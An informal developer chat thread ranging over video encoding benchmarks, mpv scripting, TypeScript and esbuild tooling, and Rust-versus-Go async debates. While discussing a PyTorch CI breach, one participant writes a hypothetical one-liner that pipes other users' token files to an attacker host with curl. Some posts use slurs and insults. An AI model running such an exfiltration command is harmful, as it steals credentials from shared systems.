iostat: shit
btop: shit
iotop: requires python2
atop: no package
how come disk monitoring in linux is so hard in 2024
host it on hyper-v and use crystaldisk
I mean the realtime RMB/s and WMB/s for every disk
it's displayed quit nicely in atop but somehow people use other shit which is just bad
5 seconds = 1.7G
NAS was a mistake, 80MB/s for y4m over wifi6 is insanely slow
need to copy everything to SSD anyway
nas can only do slow backups and watching videos
>seems comparable
if only...
# boat x265: 98.289024 vtb: 93.614052 # crosswalk x265: 97.482390 vtb: 92.577791 # foodmarket x265: 97.128685 vtb: 92.009776 # foodmarket2 x265: 99.218935 vtb: 97.213482 # narrator x265: 94.178524 vtb: 92.100044 # ritualdance x265: 97.969079 vtb: 93.435787 # squareandtimelapse x265: 99.914871 vtb: 98.164348 # tunnelflag x265: 99.982536 vtb: 99.965692
it's over... fast encoding is impossible...
hwenc dream is over... if x265 is so good, would rather use av1 because it's swenc anyway, who needs worse coding tools...
maybe it's possible to make videotoolbox work better
guess where is videotoolbox and where is x265
quite the difference
I have another idea
can you find worse video without pause?
AB testing!
there's slight glitch at the end, seems to be because of B-frames ordering. dunno how to fix, timestamp issues are horrible to deal with
# vtb pts_time=0.083333,dts_time=0.083333 pts_time=0.100000,dts_time=0.100000 pts_time=0.116667,dts_time=0.116667 pts_time=0.133333,dts_time=0.133333 pts_time=0.150000,dts_time=0.150000
# x265 pts_time=0.066667,dts_time=0.050000 pts_time=0.150000,dts_time=0.066667 pts_time=0.116667,dts_time=0.083333 pts_time=0.100000,dts_time=0.100000 pts_time=0.133333,dts_time=0.116667
seems like no b-frames in videotoolbox
it's probably not over yet
is this a mvp script hub?
i need more!
what do you guys use
webm.lua is the best and also smart copy paste
nothing, hate tinkering with configs/plugins
it's always too fragile and/or consuming too much time for little value
well, it's not that bad with mpv because most scripts seem to be small and solving just single task
but software like emacs, obsidian kills me
even in vscode some popular plugins like gitlens are so horrible. devs try to include all possible features they can think of. such a mess. I installed it day ago because wanted the "git-blame-for-the-current-line" feature but I couldn't stand the UI mess and deleted it right away can't believe there're people who honestly think that's fine
i used boram for a long time but webm.lua is just too good, no need to change to different app to get that perfect clip.
luckily vscode has profiles now so you dont have to use all plugins all the time. though indeed still gotta be careful outside official language plugins since plugins have godmode on your computer, access to everything
it's sad once programs get older they cant change to better default settings or risk breakage for older users, so people gotta hunt down those recommended minimum settings that make sense in current year. if i were to start with terminal editors again i would probably go with helix, surely it would have the best defaults
>forgot to enable 2nd esim before registering in whtatsapp
>it said can't send sms
>activated sim
>nothing received
>trying registering again
>wait 60 minutes
>nothing can't be done to make it faster
I stun-locked myself because of stupid facebook
>vscode has profiles now
I usually just disable plugin if I don't use it often
>since plugins have godmode on your computer
no access to Documents/Downloads in macos by default
and even better control with tools like fedora toolbox
>cant change to better default settings or risk breakage for older users, so people gotta hunt down those recommended minimum settings
well said. that's why I prefer minimal configs, to avoid locking myself to outdated workflow
it's not the esim, it's just blocked, need to use vpn to register in whatsapp
gosh, this world is so stupid...
amd64/ubuntu via rosetta is 2x slower than arm64/ubuntu in docker
quality-menu is really nice
god i hate azure
dealing with x64 and arm64 dockers is tiresome
stupid ISA wars
imagine we will have to switch yet again to RISC-V in 5 years
can't distinguish without pausing tbh
maybe videotoolbox isn't that bad
need to look very closely to hair to notice something
another proof that screenshots are useless, need proper AB testing
no workie on feuerfox?
>Supported for devices with hardware support (the range is the same as Edge) on Windows only. Enabled by default in Nightly and can be enabled via the media.wmf.hevc.enabled pref in about:config. 10-bit or higher colors are not supported.
remember when haskell was the hottest thing and everybody had been creating editors and similar software in haskell, just for the sake of it
need to ask ryan to implement deno-mpv
seems not too hard to embed v8 with typescript and npm and get very nice scripting support
but mujs with es5 is useless
>LuaJIT uses rolling releases. There are no release tarballs available for download.
>Do not use pseudo-releases or tarballs created by third parties. Do not use binaries offered for download by third parties.
imagine what debian maintainer thinks reading this
mujs is too slow
what's worse: potentially bad performance or lack of types
typed lua
oh yeah, I think I don't like Lua at all
wtf, they stole my idea
seems like launches separate process to communicate with the program (neovim)
that argument
>v8 is too big
is retarded
lua scripting is just too bad... no way except v8. 28mb, so what? not a big deal
well, maybe quickjs is quite ok too, but no one embeds it either
very nice, I like deno now
but deno vs npm fragmentation isn't great
can live with deno imports for simple deps, but complex deps won't probably work
now just need to wait 10 years until neovim, mpv and other programs integrate scripting in good language
what about plugins in Rust compiled to WASM so don't need to recompile for every platform?
but TypeScript feels nicer for scripting stuff
it's alive
how about deno@quickjs?
>A modern editor with a backend written in Rust.
>Maintenance status: The xi-editor project is currently discontinued.
I use rust btw es6 enough
nah, it's another coffeescript
received kindle
but I don't have time to read now
why do you encode to vp8 so often? it's even worse than x264
to be compatible with 4chan and hate the libvpx-vp9 speed?
chrome breaks every day for me
cursor on the page stops updating to the content (always the default shape) and I have to restart it to fix
can't believe they pushed such a major bug to production
webm.lua defaults im on team noconfiguration
unpacked kindle. yeah, the firmware is old so I can jailbreak it
but I don't want to right now
and if I connect it to wifi, it will update right away
will read offline for a while...
kindle feels very nice, maybe I will even read something
>inb4 just one book
whats the problem
I lose interest too quickly
>Microsoft Edge has a new name on iOS and Android – it’s now called “Microsoft Edge: AI browser.”
>Orion and Brave have the best adblockers for third parties atm. Brave lets you actually have multiple filters without a limit like Adguard for Safari
why would you use browser without ad blocker in 2024
I had to use chrome on ipad because of translate feature and it was horrible
>Microsoft Edge has a new name on iOS and Android – it’s now called “Microsoft Edge: AI browser.”
buy this one
I want to buy mx mechanical mini now
tiny Fn keys is a joke
first impressions are in
- sub syncing seems great now, ffsubsync and subaligner sync em good
- i have the eng subs but didnt find any magic stuff for translating it into mother lang currently thinking i should probably just use chatgpt in smaller pieces and as it makes mistakes correct them. subtitle file alone is not enough context afterall so it'll keep happening
- unfortunately the original sub is not reply marked between speakers but diarization would probably be too much work so maybe its fine
rip korean learning
so great to code with 3 monitors
too bad the 3rd (notebook) is too small
it's 1200€ isn't it
chump change compared to the macbook, and you can use it with multiple macbooks through the years
what macbook, i have to get a pc too
oh right i thought it was only rubber duckie here yeah that sounds a bit hefty in that case, can them oleds really last 5+ years without burn in?
stop calling me duckie
maybe, probably a little burn in wouldn't be the end of the world either
last gen might be worth considering, what if some ballers buy the newest gen every year then resell
3 screens is not enough, need at least 5
i'm using one right now
wrote only about 600 lines for today (very simple stuff)
I'm not very productive
imagine side channel attack by kindle
imagine it has some hidden sensors like microphone, gps chip, 5g chip
then you go to, browser asks for permission to use your microphone
then kindle starts transmitting all information it knows about you by playing high-frequency sound, which you can't hear, but can be recorded by your notebook standing near by and sent to the amazon servers
he's pushing a lot of code
need to train BellardGPT on the way he works, it would be perfect.
>One day, while studying old code, I found out that it's possible to encode Windows Portable Executable files as a UNIX Sixth Edition shell script, due to the fact that the Thompson Shell didn't use a shebang line. Once I realized it's possible to create a synthesis of the binary formats being used by Unix, Windows, and MacOS, I couldn't resist the temptation of making it a reality, since it means that high-performance native code can be almost as pain-free as web apps.
but what about AMD64 vs ARM64 ISA nowadays you need arm64 for macos and amd64 for everything else
tested a few more and it wasjust luck afterall.
syncers dont work really well, whether its those waveform watchers or speech recognising ones its all random whether it works out or not. no free lunch
dumbass stenographers only doing half the work
HEVC Main10 works in Telegram
another reason to encode to HEVC
i thought hevc was the evil option with the license fees for hardware makers
not anymore
netflix continued to encode to hevc and browsers wanted to make the streaming work (not sure it's the main reason, but could be one of), so they added hwdec support (not sure if they play roalty fees for that). even firefox added it (experimentally) who was the biggest opponent
but no swdec in any browser as far as I know
what about av1 from youtube
yt-dlp -f 398+251 '' --merge-output-format mp4 -o weekly.mp4
only sound in telegram, doesn't work in safari as expected, swdec in chrome... and no hwdec/hwenc for most people
need to wait few years it seems, hevc looks better right now
although if you use firefox or doesn't have hwdec for hevc (still many people) it won't work too. uh it's too complicated... only h264 works everywhere
maybe need to push for av1 because it will become the norm. but the hwenc is too nice to lose
몰라 아 아 아 몰라
maybe vendors have settled that they don't pay fees for hevc hwdec. or very little
even without context problems 3.5 turbo makes kinda yikes errors from time to time when translating though they did mention that themselves somewhere too
also tested 4 turbo and seems better overall, though still has some mistakes
damn acutally turbo 4 is way better on some things 3.5 messed up at
15 cents per episode but maybe its worth it after all that time wasted cleaning up after the stenographers
>tested 4 turbo
did you buy subscription?
>15 cents per episode
translating kpop vlogs?
so you get korean text with whisper and then just paste it to gpt4? why not something free like google/deepl?
post some examples
api, found a lil program that automates the process
just some old british telly for me parents
gm204 from gtx970 can only encode hevc 8-bit
try on kpop then
there's an mpv script idea for you
send current loop to whisper for transcribing and display/copy to clipboard the results
you mean like live youtube subs? sounds interesting
not sure if I want to pay for that api tho
btw, what's better, youtube auto subs or whisper?
also probably should just learn korean instead
u can host whisper on a regular computer use online whispers sometimes when really want to know what was said but need to clip it and make mp3 and upload, be much nicer with an mpv script that does that for you
oh, I didn't know it's open source
that AI stuff is developing too quickly, I'm lacking behind
>when really want to know what was said
like when?
how come ggerganov is so cool
tired again after few hours of coding
I even walked today but didn't help
seems normal
Carmack said he can code all day long
>FIXME: this is a bit of a mess. We should probably have a class for this.
copilot recommended me this comment
>priveleged ISA
copilot is kinda useless but still necessary because it would be annoying to not have it hit us up if you find an alternative
it helps a lot when you write boilerplate code
but hardly helps when you do serious refactoring, need to edit everything by hand
and then you wonder for 15 minutes why something isnt working properly because it used some hardcoded value instead of parameter i dont want to pay for this at least you dont need to pay for it
oh yeah, we are the point when AI advices are useful enough to be used in some cases, but because we're lazy we overtrust it and accept shitty output without checking
not sure what're the consequences of global exposure to ChatGPT in near terms...
>fn key somewhere in the middle
>f12 3 keys to the left from the right side
>enter not on the edge
nah, it's not very good too
I'm at the point of building my own mechanical keyboard
it was so comfy to code with macbook's keyboard in VSCode: with auto Fn lock and F12 on the right and F4 for spotlight
now need to learn the position of those tiny buttons which are located in stupid places
gonna try this according to doc it might work with apple silicon no need for nmidia
what macbook do you have? 빨리 대답!
>so comfy to code with macbook's keyboard
suddenly this video came to mind:
now I get it... you get keyboard, the hardware and it also should be very cheap, probably cheaper than mac mini
maybe should have just bought apple's keyboard tho
I didn't know logi is so meh...
hm, I still can buy it and sell my logi's keyboard tho
am I ready to another contact with human?..
fn keys sound very different from apples then? that sounds annoying
also emoji button :D does it support smiles
also no globe key to enjoy?
emoji = open emoji window, it's mapped to fn=globe on macbook by default
but you don't have globe on logi, yeah, so hotkeys like globe+f (for fullscreen) won't work
overall it's nice typing experience, but button layout isn't ideal for macos
what configuration?

uh oh, I can only find ISO layout of magic keyboard
although apple's keyboard is lightning and I don't want to buy device with outdated connector... also need to charge more often
huh, maybe I can adapt to logi... can buy once apple releases usb-c version maybe
I found a bug in project which left unnoticed for 4 years
that's why you use type checking
>and then you wonder for 15 minutes why something isnt working properly because it used some hardcoded value instead of parameter
you're goddamn right
I'm also afraid to use it when working with important code because I would rather it carefully by myself, then would spend hours trying to debug later
but zoomers seems have no problem with it. they just copy&paste&tab all the time and have no fear
"scripts": {"script": "a && b"}
time npm run script = 0.5s
"scripts": {"script": "npm run a && npm run b", "a": "a", "b": "b"}
time npm run script = 1s
dumb npm devs can't make even the simplest shit fast, on fast computer
time npm run nonexist
takes 200ms
meanwhile esbuild: I'm done boss, took just 2ms
JS is saved
how to combine tsc --watch and esbuild --watch in a single terminal tab
I've come with a
solution for second process but it feels fragile... might kill someone else's esbuild
maybe can use rollup/vite or tsc-watch, but dunno, why overcomplicate, esbuild seems nice enough
maybe get the pid and just kill that
$! is the last background process's pid if that helps
yeah, I was thinking about that too
maybe can also use swc
% npm i -D @swc/cli @swc/core added 125 packages
esbuild build/index.js --bundle --outfile=out.js --target=es5 --watch=forever & trap 'kill $!' SIGINT && tsc --watch
works perfect
and typescript+esbuild is just 3 packages
I defeated the evil node_modules, take that sindresorhus
imagine how much simpler things would have been now if typescript in comments had succeeded.
no le build tools no le watchers, just regular ol' javascript files (with all the types in comments) typechecked by editor and again before commit, all combined with import maps only i was smart enough to write stuff without typechecking
>typescript in comments
nah, that would be messy
they will just define "optional type annotations" in new ES standard (without type enforcing) to be compatible with TypeScript
just like mypy works
also dhh is fucking moron
nah, kleinebruder is our biggest defense against big js
not that messy, its the same stuff just each within
/* */
>not that messy, its the same stuff just each within / /
people were writing jsdoc decades ago and it was bad
facebook's flow does support that feature btw
but nobody uses that because it sucks
SyntaxError: regular expression: too many character class ranges
rip mujs
defining different typescript configs for src/ and test/ is tiresome
node --enable-source-maps
to fix stack traces
why can't iphones etc smartphones remember the sim card's pin number?
all the fancy secure enclaves and tpms whatnot and you still have to enter pin after every boot what's up with that, they left that annoyance just to push people into adopting esim?
>and you still have to enter pin after every boot
I don't enter it
maybe you set it before
i mean you can disable pin and then if your phone gets stolen it can be used to prop up the phone bill.
but if you do have a pin set why can't the phone remember it?
but if you think about it, it's very insecure because many services are 1FA (bound to your phone number by sending SMS with code to reset password)
so if someone stole your phone they can login into many websites
now you made me worry. I need to setup my main SIM as ESIM too, but my iphone doesn't support 2 simultaneous ESIMs unfortunately. need to buy a new one
ah, you mean remember pin in one specific phone, but it won't let you use SIM services until you login with passcode. interesting idea
someone actually found my hidden project
>bound to your phone number by sending SMS with code to reset password
that too
found another bug because of lack of typing
now I don't have any idea how could I program in typeless python, javascript, bash for years, without much issues
probably "run-oops error-fix-run again" dev loops wasn't so annoying back when you didn't have typed scripting solution anyway
but I already switched to another
what do
>As a note, properties order in objects weren’t guaranteed at all before ES2015
it can write polyfills for ES5 very nicely
what if go is actually amazing and im just dumb
a million flies cant be wrong
go is one of the worst languages people write code in, comparable to ES<=5 and Java
rust is millions times better but because google has power to push its shitty language, we can't have nice things
thankfully people are smart enough to notice that rust is still good
they also want to push for Carbon, another shitty language by Google
they just can't create good stuff
Dart: shit
Go: shit
Carbon: shit
even Apple created nice Swift and Microsoft created TypeScript and Mozilla created Rust
but Google devs are just incompetent retards
although I still can't decide between modern C++ and Rust
they pushed tons of features into C++ and because it's 100% compatible with all previous code you don't need to rewrite anything and don't need to write bindings
just dunno what's better
but gopeopel write the most amazing things
all the cool stuff like charm, caddy, sqlc, pocketbase are in goworld, rust has few other than option and enum types, serde and clap
>charm, caddy, sqlc, pocketbase
never heard of those
but heard about serde and clap
>Carbon is guaranteed to get some short term traction just like Dart did and Go did because Google is a behemoth. Rust however already has penetration at other large corps, and I think it's unlikely Carbon achieves equivalent memory safety.
>I totally agree with your assessment on this. Dart showed us that Google does not know how to scale a programming language.
from carbon subreddit
>Why Rust is Stopping Your Success. Use C++ and C# Instead.
writing a lot of new simple code in rust must be pain tho
in typescript I can hack my stuff around with
as any
and make it work, then refactor laterin rust I would have to fight the compiler for hours, thinking about nice abstractions and types
>If you are willing to make liberal use of clone and only optimize tight loops you can mostly ignore the borrow checker and move very fast
why people write user scripts for mpv in lua and js if Rust is so simple
what's the point of videos like "what's the best way to X" on youtube
there're tons of videos like that for every topic, do they imply you have to watch them all to collect all the "best advices"?
try googling for “best X”
youtube recommends me some girl with video "what's the best way to learn japanese" because I watched few videos about asian languages shameless bait videos annoy me a bit
no build step #teamdhh
oh, it was even worse actually, the "watch this before X" bait video
stupid shills
what's the difference between serving JS file from filesystem via HTTP and stripping types on the fly + serving via HTTP (with something like esbuild)
parse AST and strip types for a typical file would take less than 1ms, so that argument by DHH is stupid
although you can't load mpv script via HTTP
>I've participated in several Hydrogen Audio ABX tests and I also ABX'ed a lot for myself. As listening tests confirmed, there's no doubt that Apple AAC is clearly the best AAC encoder regarding quality at a specific bitrate.
but what's better, VBR or CVBR
why are people so into camelcase
isn't snek case way easier to read or is it just my dumb eyes
I like snake a bit more because things like
are tricky to handle consistently, but otherwise both are ok
10 years ago I was anxious because I was though my vimrc isn't big enough so I'm not very productive
5 years ago I was anxious because I though my JS framework isn't fresh enough
now I'm anxious because I'm afraid I don't use enough AI assistants world out there
>Our exploit path resulted in the ability to upload malicious PyTorch releases to GitHub, upload releases to AWS, potentially add code to the main repository branch, backdoor PyTorch dependencies
I think you shouldn't be able to modify CI script as a complete stranger who just forked the repo
of course if you can ran arbitrary code, you would be able to leak secrets
>Travis associates an RSA key pair with each repository. The string after secure: is your value encrypted with the public key. To decrypt it, one needs the corresponding private key which is only available to Travis.
>If someone forks your repository, they won’t be able to decrypt the secret values because that would be a different repository, with a different key pair.
so in travis, your tokens are decrypted only if someone has push access to the repo
I dunno what those pytroch people messed up
>When a workflow uses the actions/checkout step, the GITHUB_TOKEN is stored in the .git/config file of the checked-out repository on the self-hosted runner during an active workflow
so the problem was the lack of sandboxing between different users of build machine?
imagine if you could
cat /home/*/tokens | curl http://evil
in your travis script and dump tokens from all other travis users
>August 9th, 2023 – Report submitted to Meta bug bounty
>December 15th, 2023 – Meta awarded a $5000 bounty, plus 10% due to the delay in payout.
imagine waiting so long for fucking $5k
막내, 맏내
easy right? mang vs man
>맏 means firstborn
It's not a real word, and there's a good reason why it and other monstrosities like 맏막즈 didn't make it into Korean v1.0.
I can't hear a fucking difference
[망내] vs [만내]
shion puts her tongue out to highlight the ㄴ in 만내
class A { constructor() { this.set(); } set() {} } class B { index = 0; set() { this.index = 1; } } console.log((new B()).index);
what do you think the result should be?
spent 15 minutes on this
oh it's
B extends A
the one on the right is a bit sekshie
the way she speaks is very weird
I still want to buy it, can't control myself
I badly need the good F12
>also emoji button :D does it support smiles
feature for cutechan: open smile dialog with emoji key
cartoon character?
I prefer the baka japanese one who doesn't know Korean well
japanese pro cookers vs korean urban pabos
% node -e 'console.log(3^0)' 3 % lua -e 'print(3^0)' 1.0
>`^´ (exponentiation)
dumbest language ever...
qrd on node's result? what operator is ^ other than exponent
it's XOR in any sane language
really? damn, i guess theres some mystery history there
make you think, can you mine fancy youtube IDs for big MV release?
something like
i.e. few nice characters at start and then keep random ones
logic programming took presedence over maths huh, they found the smallest V up in the keyboard and used that
program wants the length of UTF-8 bytestring but I only have Unicode symbols in JS
> str.length + encodeURIComponent(str).match(/%[89ABab]/g).length > '세모콘'.length + encodeURIComponent('세모콘').match(/%[89ABab]/g).length 6
but what if terminal non-utf8? 끝났어
>Here is a much faster version, which doesn't use regular expressions, nor encodeURIComponent()
% node -e 'console.log("세모콘".length)' 3 % lua -e 'print(string.len("세모콘"))' 9
jsbros, we kneel
i've written code like
while filename.bytes().len() > max_bytes { filename = filename.chars().take(filename.chars().count() - 1).collect(); }
to fit within some encrypted filename length limit utf-8 to difficult for me dumb
fucking stupid SWC, it keeps looking into tsconfig even tho I don't want that
working on GUI kills all motivation
in 2024 you still need to compile your typescript
into javascriptlib/
, like people had been doing 15 years ago with coffeescriptdeno please save us
but I think they will just add typescript annotations to next ES standard soon
>Deno Third Party Modules
> is a hosting service for Deno scripts. It caches releases of open-source modules stored on GitHub and serves them at an easy-to-remember domain.
fuck, it's so much simpler than that stupid npm shit
I guess you just add link to your github there once and that's it, you just need to push tag on github to keep it updated
no compilation, no fucking stupid npm publish, everything just works
node was a mistake
>can't downlevel ES
>slow and stupid
>build your own bundler
welp, I guess it's still node for now
>If you use a syntax feature that esbuild doesn't yet have support for transforming to your current language target, esbuild will generate an error where the unsupported syntax is used. This is often the case when targeting the es5 language version, for example, since esbuild only supports transforming most newer JavaScript syntax features to es6.
oh, the happiness was so close stupid es5
>What I do is run esbuild and tsc (with no emit) in parallel in watch mode.
stole my idea
>swc does transpilation and it's as fast as esbuild
stop, I probably still can try deno with swc
>2 years ago
nah, it's dead
rip deno, that was your last chance
one more chance
this doesn't look very supported tho
but the code is very small and simple
so it seems like it's possible to use deno to bundle TS to ES5
maybe try later ie support then?
chrome is also jumping on the whisper train no korean yet though
mujs is only es5
that feature was announced few years ago tho
ELI5 on reddit is just an excuse to be lazy cool to see what people have made with this
mypy is worse than typescript tho
procrastination: instead of reading on kindle I'm writing tons of code
win-win situation, money well spent
touch .file
touch ..file
also works
you can touch . and .. too
I mean I've never seen a file with two initial dots before, but should work just fine
nobody uses them for some reason
supposedly filenames allow all sorts of gobbledigook so std::path is kinda awkward to use but for the casual utf-8 stuff there's camino
can you call that controlled procrastination?
step1: you're lazy and unproductive
step2: start doing something you really hate but still consider as necessary, push for it
step3: you hate it so much that you would rather do everything else imaginable
step4: now you not so lazy anymore
interface A { k1: string; k2: string; } type B = { [key: string]: string }; function fn(arg: B) { console.log(arg); } const a: A = { k1: "1", k2: "2"}; fn(a);
Argument of type 'A' is not assignable to parameter of type 'B'. Index signature for type 'string' is missing in type 'A'.
type A = { k1: string; k2: string }
worksfor some reason interface isn't compatible with indexed type although what else could it be in JS if not object
I've found a project which is 10x more advanced than mine because written by super-productive Chinese (but messy)
stage 1
2002 Javascript 2.0: Evolving a Language for Evolving Systems
2006 Type parameters, Type System and Structural Types and typing of initializers
2011 Dependent Types for Javascript (pdf)
2011 Guards and Trademarks
2014 TC39 Discussion on Types: adding syntax without semantics.
2015 ES8 gradual typing and part2 and ecmascript-types.
damn, that's a lot of history
>the support team is very confused because there hasn't been a code change in weeks (so nothing to roll back to)
>using a pointer field without a nil check
>But the Kotlin guys were very fast to point out that this would never happen in a Kotlin or JVM app
I can't believe Google could push such a shitty lang and people fell into it. pike is a huge moron who doesn't know shit about type theory, stuck in the past...
my mistake of even writing some code in it, I helped to made world worse too. forgive me Jesus
jsdoc works in typescript btw
so many stuff in rust for js these days
and nice guy ryan went with rust too
so go is like the new python, for the web/scripts stuff only. and rust for the real work like C (even in linux kernel)
too bad rust dependency tree now looks like npm too well, if you install binaries it doesn't matter, but still worrisome
it's a weird world if you think about it
smart guys (creators of hardware → kernels → programming languages → core tools → core libraries → frameworks) work really hard to make their stuff as fast as they can and allow higher abstractions to run fast enough
at the very low end are idiots like sindresorhus who abuse the stack and ruin the performance just because they want to be lazy or "creative"
can we program in higher abstractions and still avoid the npm destiny?
google says it some person who makes a ton of funny lookin mac traybar applications
he advocated for 1-line npm deps so that's why we have that node_modules mess today
very successful at pushing harmful practices, just like php and go
Bellard is not using SJW's main name for the default branch
quickjs is safu
that fork stuff is weird tho. why couldn't he just make quickjs the next ffmpeg or qemu, by allowing people to commit
maybe it's too early stage yet so he wants to modify a lot of stuff by himself
why is that fucking copilot extensions updates several types per day
does chatgpt write it by itself and can't stop pushing???
tired of coding already
that's because I did all the nice things and now I have to do the awful things (the UI)
I would rather read books than coding UI
class A_v1 { apiMethod() { return 1; } } class A_v2 { random() { return 2; } apiMethod() { return this.random(); } } class B extends A_v2 { random() { return 12345; } } const b = new B(); console.log(b.apiMethod());
the fuck is wrong with OOP
say you extended a class and then added some random useful method
then in next version of library class which you extend then added method with the same name
so you now broken everything and no type checking can protect you from that
need to use interfaces instead
maybe prefix method names which you don't want to collide
class B extends A_v2 { b_random() { return 12345; } }
programming is difficult
probably inheritance isn't worth it at all
if there's small amount of code, you can copy-paste methods
if it's huge amount of code, you will 100% break things while changing base class
stupid stupid OOP
>In scenarios where you are extending classes from an external library and there's a risk of method name conflicts in future versions, one approach to mitigate this is by using composition instead of inheritance.
chatgpt answer
>In this example, the B class is a proxy that dynamically delegates method calls to the A_v2 instance. This way, you don't need to manually create wrappers for each method in A_v2, and any changes to the underlying A_v2 class won't affect the B class as long as the public API remains consistent.
AI is actually smart
smart AI
public static void main
the mystery keywords that make no sense until much much later
I wrote too many
and found later that they aren't necessary (the default)how to stop caring about such minor things
it's great that you can import garbage code into typescript, then improve types gradually and nothing will break while you refactor
imagine trying to refactor garbage code without types tho people used unit tests for that in the past, but that's a bit tiresome. I want unit tests only for pure functions where I need what's the output should be, not random mutable mess, spending hours mocking that
all because typescript was designed by a genius
imagine if he was designing language for google instead of retarded pike
what's the actual solution to the UI problem, i'm guessing it's not v0 since you tried that already (with not that usable results?). why does every application need their own ui
maybe just a box with a command palette would be sufficient in the future you could make it more fuzzy and easier to find commands too by semantic search. to support power users the commands would all be assignable to hotkeys with common stuff already assigned. sure you cant do absolutely everything with commands but probably most things people do would work fine.
so that would leave showing the current state to the user. for example a kpop scraper extension on an IG post shows user subscription status, user tags, post scraped status. maybe some generic tree like display with support for enums/booleans etc would work here? i guess current state would be the more likely a custom ui thing here, showing a tree or some graph or in vscode's case the text file. some of it probably generalisable though
and then there's buttons to subscribe/unsubscribe/scrape/set tags. the simple buttons are easily replaced with command palette. set user tags does need a form text input but that's a very generic thing nothing super app specific, maybe we can make commands that ask you to fill a form before executing.
just in case you didn't notice i love the command palette crazy it was invented so late. a buncha rows and columns of buttons microsoft office style is stoopid
>it's not v0 since you tried that already
I'm not doing UI for the web, but for the app
also I was too lazy to even try the v0 once I granted the access lol
>maybe just a box with a command palette would be sufficient
post some images, not sure I understand what you're talking about
also the huge problem is to make it user friendly. I'm usually fine with cmdline but if you want your app to be usable by random person you have to make it similar to all other apps. and designing app in that style is too hard... I can't do things without proper objective metric (like drawing)
maybe I'm an AI
>post some images, not sure I understand what you're talking about
like how in vscode you don't need to find a button or go through some hierarchical menus to find stuff like open file, format document or some extension command. just write it in the fuzzy search command palette.
though if you just want a gui version of cli i guess you could use
>like how in vscode
oh, I get it. but still, there're a lot of buttons/design in vscode. also a config
although maybe that's a way do hide many advanced options
tbh I don't like that pyqt/qt thing much, I want the native stuff. qt/electron usually work bad
they even rewrote telegram to swift on macos, even tho they had perfectly functional telegram destkop in qt (c++). tells you a lot about qt
I don't want to type protected in all child classes
>year of the blue dragon 2024
>going all in on object oriented programming
is that a good thing or a bad thing?
I love typescript tho, elegant as Ningning
how is it so fast on huge projects with tons of type declarations if typescript runs on JS runtime tho
V8 JIT can't be that cool, right?
>Internally Deno uses Microsoft’s TypeScript compiler to check types and produce JavaScript. Compared to the time it takes V8 to parse JavaScript, it is very slow. Early on in the project we had hoped that “V8 Snapshots” would provide significant improvements here. Snapshots have certainly helped but it’s still unsatisfyingly slow. We certainly think there are improvements that can be done here on top of the existing TypeScript compiler, but it’s clear to us that ultimately the type checking needs to be implemented in Rust.
maybe it's fast only on fast computers
>2.83 MB
>51K lines that effort into colored functions only for it to be a mistake
>Developers got stuck in "synchronous is slow" when they should have embraced "threads should be cheap".
>So instead they reinvented really awful "cheap threads" without any understanding of what they were doing.
>CEO @ZivergeTech, OSS contributor @zioscala, speaker, writer. Building the future of cloud computing @GolemCloud.
that idiot has to idea he's talking about. I bet he's never looked in the kernel source once
oh very very high performance, yeah, cool story lilbro
I think he meant N:M model like in go/erlang
but you can have async API mapped to OS threads in modern languages like rust
he just doesn't know anything
>A common solution to this problem is preemption. With normal OS threads, the kernel will interrupt execution every so often in order to ensure fair scheduling of all threads. Runtimes that have full control over execution (Go, Erlang, etc.) will also use preemption to ensure fair scheduling of tasks. This is accomplished by injecting yield points — code which checks if the task has been executing for long enough and yields back to the scheduler if so — at compile-time. Unfortunately, Tokio is not able to use this technique as Rust's async generators do not provide any mechanism for executors (like Tokio) to inject such yield points.
>Languages with "green threads" like Go and Erlang implicitly modifies all code to periodically call into the scheduler, and ask if it needs to pause for a bit while something else runs. This solves the blocking problem, but creates other issues: since there is a scheduler always behind your back, it creates CPU overhead. A language with a scheduler cannot be called into from other languages (which is why there is no such thing as a cross-language library written in Go, only C/C++/Rust). And if you call into something else (e.g. a C or Rust library) you run into blocking issues all over again.
oh, I got it now
>To account for this, Tokio has explicit yield points in a number of library functions, which force tasks to return to the executor periodically.
but in go it's a bit better yeah
>The spawn_blocking function can be used to "asyncify" these sorts of tasks by running them on a thread pool where blocking is allowed.
>This function runs the provided closure on a thread dedicated to blocking operations.
>Tokio will spawn more blocking threads when they are requested through this function until the upper limit configured on the Builder is reached. After reaching the upper limit, the tasks are put in a queue.
such a hack
>The most common follow-up question I've received after this is "doesn't the Go scheduler automatically detect blocked tasks?". The short answer is: no. Doing so would result in the same stuttering problems as mentioned above. Also, Go has no need to have generalized blocked task detection because Go is able to preempt.
>Rust's async generators do not provide any mechanism for executors (like Tokio) to inject such yield points.
so the problem is in rust compiler?
well, in rust you have control over async anyway (can spawn_blocking to preempt). in go it's all automatic so can be wrong in some cases
so you can't say "async is bad"
>For example, the pure aspects of the browser cryptography api are async, for example the encrypt function. This forces us to make our function async and propagate that up.
oh yeah, that's a real pain. simple encryption routines shouldn't be async
but in rust you can always convert async into sync:
async fn example() -> i32 { 42 } fn main() { let v = executor::block_on(example()); println!("{}", v); }
so there's little downside if at some point in time you decide that async was a mistake
explain this
well in Go it's a complicated N:M where it would reuse the threads for async IO operations, so it doesn't context switch all the time
but what if you need the full control over when to use same thread and when to switch to another? Go can't give you that
>In most Rust code, both iterators and async state machines as well as their variables do not escape to the heap. Everything just opens subscopes in the stack.
>If you still await most async calls the standard way, it's still far more efficient with a lot less spawned tasks and no unnecessary heap usage in the background.
>But about Java, again, I am reading that it's still using the heap. And I believe the same must be true for Go as well.
also very efficient usage of the memory and stack
you can also say: all that effort into Go only for it to be a mistake (wrote all stuff in Go because implicit async looked nice and regret that later)
im webshitter so idk anything about 0.3 vs 17 μs. colored functions are indeed sad tho
, plus of course rust async type signaturesluckily people are building simpler to use languages for dumbos like me on top of rust, maybe the future is yet to come
gleam is on top of evm tho. there's also elixir, but I like that they added typing at least (is it any good tho? python is also typed with mypy, but it's too dumb)
roc ← why would you need to build something on top of rust. it's like the history of CoffeeScript, LiveScript, MoonScript and dozens of other stupid languages didn't teach people anything (well, it makes sense for a creator, to become better programmer. but people who're actually using that are too )
>async type signatures
if you don't distinguish async functions, then you wouldn't be able to dispatch cooperative/preemptive type of tasks differently, like in go. it's probably fast enough for most people tho, that's why it's so successful
but go is disgusting language by design, so makes no sense to use it at all
gleam's compiler (for evm) is written in rust, but it's not related to rust at all
roc is completely new language, not related to rust at all too (just have compiler in rust)
dunno why would you use both of them. erlang was a thing in 2000-2010, but now it's basically obsolete. elixir was a nice attempt but didn't change much
roc is
coffeescript basically made es6 tho
where did you get that info from?
I also hate Zig btw. just wasting community effort instead of working on Rust
